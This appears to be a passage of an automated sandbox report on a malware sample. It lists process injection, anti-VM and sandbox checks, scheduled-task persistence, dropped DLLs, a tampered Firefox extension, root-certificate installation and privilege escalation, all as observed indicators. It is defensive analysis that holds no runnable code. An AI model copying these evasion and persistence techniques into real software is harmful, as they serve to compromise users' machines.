C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CotgOgQ.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini smyDlk5Es9ywvt8vYzqP4xsg.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol smyDlk5Es9ywvt8vYzqP4xsg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 CotgOgQ.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process
5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
2992 explorha.exe
4772 explorha.exe
1784 smyDlk5Es9ywvt8vYzqP4xsg.exe
5864 explorha.exe
5416 explorha.exe
5176 explorha.exe
2556 explorha.exe
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target
PID 2712 set thread context of 4496 2712 swiiiii.exe 78
PID 1968 set thread context of 3324 1968 swiiii.exe 86
PID 2796 set thread context of 4812 2796 gold.exe 90
PID 2316 set thread context of 4964 2316 file300un.exe 93
PID 2744 set thread context of 4872 2744 alexxxxxxxx.exe 104
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 5 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process
File opened (read-only) \??\VBoxMiniRdrDN WNVWzyQ9U4x61stEDAP6lzkw.exe
File opened (read-only) \??\VBoxMiniRdrDN 3QQWENYHN4zHu7XvvsSKZTYq.exe
File opened (read-only) \??\VBoxMiniRdrDN Ckl9TyIZXKdlKs1JCVsLffk7.exe
File opened (read-only) \??\VBoxMiniRdrDN YYVxHJ2hAo7YMQ97pBCimtCf.exe
File opened (read-only) \??\VBoxMiniRdrDN 4767d2e713f2021e8fe856e3ea638b58.exe
Drops file in Program Files directory 39 IoCs
description ioc Process File created C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi CotgOgQ.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\AmTHQUu.dll CotgOgQ.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CotgOgQ.exe File created C:\Program Files (x86)\ADJLsahCU\BcSeElW.xml FhZPPvs.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\wKCalaf.xml FhZPPvs.exe File created C:\Program Files (x86)\mWJfrhglotUn\usgaMXv.dll FhZPPvs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja CotgOgQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FhZPPvs.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\vqlvkhH.dll CotgOgQ.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\SEacfvq.xml CotgOgQ.exe File created C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\ZejsVIC.dll FhZPPvs.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\XqwFgzo.dll FhZPPvs.exe File created C:\Program Files (x86)\PZjcxajBIsNTC\lANuDZv.xml CotgOgQ.exe File created C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File created C:\Program Files (x86)\ADJLsahCU\HzvOZz.dll FhZPPvs.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\HkLcRXzDBqqXF.dll CotgOgQ.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\PHYzavZOuZqzQ.dll FhZPPvs.exe File created C:\Program 
Files (x86)\AymmxTCbqblaRZJGVqR\uvvouwo.xml FhZPPvs.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\phqMPFN.xml FhZPPvs.exe File created C:\Program Files (x86)\mWJfrhglotUn\JSnaPUK.dll CotgOgQ.exe File created C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File created C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\ADJLsahCU\kcXDqX.dll CotgOgQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CotgOgQ.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi CotgOgQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi FhZPPvs.exe File created C:\Program Files (x86)\DQANlvmTAvZU2\snzniaG.xml CotgOgQ.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\ADJLsahCU\jgzmjeb.xml CotgOgQ.exe -
Drops file in Windows directory 20 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\explorha.job | 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
File created | C:\Windows\Tasks\XyyyteIMwZeutaZuw.job | schtasks.exe
File created | C:\Windows\rss\csrss.exe | 4767d2e713f2021e8fe856e3ea638b58.exe
File created | C:\Windows\windefender.exe | csrss.exe
File opened for modification | C:\Windows\rss | YYVxHJ2hAo7YMQ97pBCimtCf.exe
File created | C:\Windows\rss\csrss.exe | YYVxHJ2hAo7YMQ97pBCimtCf.exe
File opened for modification | C:\Windows\rss | 4767d2e713f2021e8fe856e3ea638b58.exe
File created | C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job | schtasks.exe
File opened for modification | C:\Windows\Tasks\XyyyteIMwZeutaZuw.job | schtasks.exe
File created | C:\Windows\Tasks\rrqYunoktxOQmCoCX.job | schtasks.exe
File opened for modification | C:\Windows\rss | 3QQWENYHN4zHu7XvvsSKZTYq.exe
File opened for modification | C:\Windows\rss | Ckl9TyIZXKdlKs1JCVsLffk7.exe
File opened for modification | C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job | schtasks.exe
File created | C:\Windows\Tasks\FPieTEPPuEmJrhC.job | schtasks.exe
File opened for modification | C:\Windows\Tasks\FPieTEPPuEmJrhC.job | schtasks.exe
File opened for modification | C:\Windows\rss | WNVWzyQ9U4x61stEDAP6lzkw.exe
File created | C:\Windows\rss\csrss.exe | Ckl9TyIZXKdlKs1JCVsLffk7.exe
File created | C:\Windows\rss\csrss.exe | 3QQWENYHN4zHu7XvvsSKZTYq.exe
File created | C:\Windows\rss\csrss.exe | WNVWzyQ9U4x61stEDAP6lzkw.exe
File opened for modification | C:\Windows\windefender.exe | csrss.exe
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 1100 sc.exe 1368 sc.exe 1076 sc.exe 4908 sc.exe 1572 sc.exe 684 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
pid | pid_target | Process | procid_target
4636 | 2712 | WerFault.exe | 76
592 | 2744 | WerFault.exe | 103
5300 | 3052 | WerFault.exe | 172
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u240.1.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u240.1.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u3s8.1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u240.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub1.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u3s8.1.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | u3s8.1.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | u240.0.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | u240.0.exe
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5684 schtasks.exe 5324 schtasks.exe 3100 schtasks.exe 652 schtasks.exe 3656 schtasks.exe 5896 schtasks.exe 4268 schtasks.exe 4804 schtasks.exe 3624 schtasks.exe 4912 schtasks.exe 3660 schtasks.exe 3160 schtasks.exe 4340 schtasks.exe 5976 schtasks.exe 4960 schtasks.exe 5296 schtasks.exe 5976 schtasks.exe 5876 schtasks.exe 6004 schtasks.exe 1392 schtasks.exe 4224 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | CotgOgQ.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1971 = "Belarus Daylight Time" | windefender.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1802 = "Line Islands Standard Time" | windefender.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-572 = "China Standard Time" | windefender.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | CotgOgQ.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | CotgOgQ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" | WNVWzyQ9U4x61stEDAP6lzkw.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Modifies system certificate store
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | jok.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [hex-encoded certificate blob omitted] | jok.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 5000 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe 2992 explorha.exe 2992 explorha.exe 3544 powershell.exe 3544 powershell.exe 3544 powershell.exe 3544 powershell.exe 4772 explorha.exe 4772 explorha.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 2696 rundll32.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe 3828 GameService.exe 3828 GameService.exe 4560 GameService.exe 4560 GameService.exe 2464 GameService.exe 2464 GameService.exe 4280 keks.exe 4280 keks.exe 4280 keks.exe 4280 keks.exe 3828 GameService.exe 3828 GameService.exe 4560 GameService.exe 4560 GameService.exe 2464 GameService.exe 2464 GameService.exe 236 trf.exe 236 trf.exe 3828 GameService.exe 3828 GameService.exe 4560 GameService.exe 4560 GameService.exe 2464 GameService.exe 2464 GameService.exe 4560 GameService.exe 4560 GameService.exe 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 2464 GameService.exe 2464 GameService.exe 3828 GameService.exe 3828 GameService.exe 3956 jok.exe 3956 jok.exe 3956 jok.exe 3956 jok.exe 5212 powershell.exe 5212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2316 | file300un.exe
Token: SeDebugPrivilege | 3544 | powershell.exe
Token: SeDebugPrivilege | 4964 | regsvcs.exe
Token: SeIncreaseQuotaPrivilege | 3544 | powershell.exe
Token: SeSecurityPrivilege | 3544 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3544 | powershell.exe
Token: SeLoadDriverPrivilege | 3544 | powershell.exe
Token: SeSystemProfilePrivilege | 3544 | powershell.exe
Token: SeSystemtimePrivilege | 3544 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3544 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3544 | powershell.exe
Token: SeCreatePagefilePrivilege | 3544 | powershell.exe
Token: SeBackupPrivilege | 3544 | powershell.exe
Token: SeRestorePrivilege | 3544 | powershell.exe
Token: SeShutdownPrivilege | 3544 | powershell.exe
Token: SeDebugPrivilege | 3544 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3544 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3544 | powershell.exe
Token: SeUndockPrivilege | 3544 | powershell.exe
Token: SeManageVolumePrivilege | 3544 | powershell.exe
Token: 33 | 3544 | powershell.exe
Token: 34 | 3544 | powershell.exe
Token: 35 | 3544 | powershell.exe
Token: 36 | 3544 | powershell.exe
Token: SeDebugPrivilege | 236 | trf.exe
Token: SeBackupPrivilege | 236 | trf.exe
Token: SeSecurityPrivilege | 236 | trf.exe
Token: SeSecurityPrivilege | 236 | trf.exe
Token: SeSecurityPrivilege | 236 | trf.exe
Token: SeSecurityPrivilege | 236 | trf.exe
Token: SeDebugPrivilege | 1044 | powershell.exe
Token: SeDebugPrivilege | 4280 | keks.exe
Token: SeDebugPrivilege | 5580 | powershell.exe
Token: SeDebugPrivilege | 3956 | jok.exe
Token: SeDebugPrivilege | 5212 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 5504 | WMIC.exe
Token: SeSecurityPrivilege | 5504 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5504 | WMIC.exe
Token: SeLoadDriverPrivilege | 5504 | WMIC.exe
Token: SeSystemProfilePrivilege | 5504 | WMIC.exe
Token: SeSystemtimePrivilege | 5504 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5504 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5504 | WMIC.exe
Token: SeCreatePagefilePrivilege | 5504 | WMIC.exe
Token: SeBackupPrivilege | 5504 | WMIC.exe
Token: SeRestorePrivilege | 5504 | WMIC.exe
Token: SeShutdownPrivilege | 5504 | WMIC.exe
Token: SeDebugPrivilege | 5504 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 5504 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 5504 | WMIC.exe
Token: SeUndockPrivilege | 5504 | WMIC.exe
Token: SeManageVolumePrivilege | 5504 | WMIC.exe
Token: 33 | 5504 | WMIC.exe
Token: 34 | 5504 | WMIC.exe
Token: 35 | 5504 | WMIC.exe
Token: 36 | 5504 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 5504 | WMIC.exe
Token: SeSecurityPrivilege | 5504 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 5504 | WMIC.exe
Token: SeLoadDriverPrivilege | 5504 | WMIC.exe
Token: SeSystemProfilePrivilege | 5504 | WMIC.exe
Token: SeSystemtimePrivilege | 5504 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 5504 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 5504 | WMIC.exe
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 4680 u240.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe 5412 u3s8.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 5000 wrote to memory of 2992 | 5000 | 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe | 75
PID 5000 wrote to memory of 2992 | 5000 | 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe | 75
PID 5000 wrote to memory of 2992 | 5000 | 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe | 75
PID 2992 wrote to memory of 2712 | 2992 | explorha.exe | 76
PID 2992 wrote to memory of 2712 | 2992 | explorha.exe | 76
PID 2992 wrote to memory of 2712 | 2992 | explorha.exe | 76
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2712 wrote to memory of 4496 | 2712 | swiiiii.exe | 78
PID 2992 wrote to memory of 3956 | 2992 | explorha.exe | 445
PID 2992 wrote to memory of 3956 | 2992 | explorha.exe | 445
PID 2992 wrote to memory of 3956 | 2992 | explorha.exe | 445
PID 2992 wrote to memory of 1968 | 2992 | explorha.exe | 83
PID 2992 wrote to memory of 1968 | 2992 | explorha.exe | 83
PID 2992 wrote to memory of 1968 | 2992 | explorha.exe | 83
PID 1968 wrote to memory of 4680 | 1968 | swiiii.exe | 506
PID 1968 wrote to memory of 4680 | 1968 | swiiii.exe | 506
PID 1968 wrote to memory of 4680 | 1968 | swiiii.exe | 506
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 1968 wrote to memory of 3324 | 1968 | swiiii.exe | 86
PID 2992 wrote to memory of 2316 | 2992 | explorha.exe | 87
PID 2992 wrote to memory of 2316 | 2992 | explorha.exe | 87
PID 2992 wrote to memory of 2796 | 2992 | explorha.exe | 171
PID 2992 wrote to memory of 2796 | 2992 | explorha.exe | 171
PID 2992 wrote to memory of 2796 | 2992 | explorha.exe | 171
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
PID 2796 wrote to memory of 4812 | 2796 | gold.exe | 90
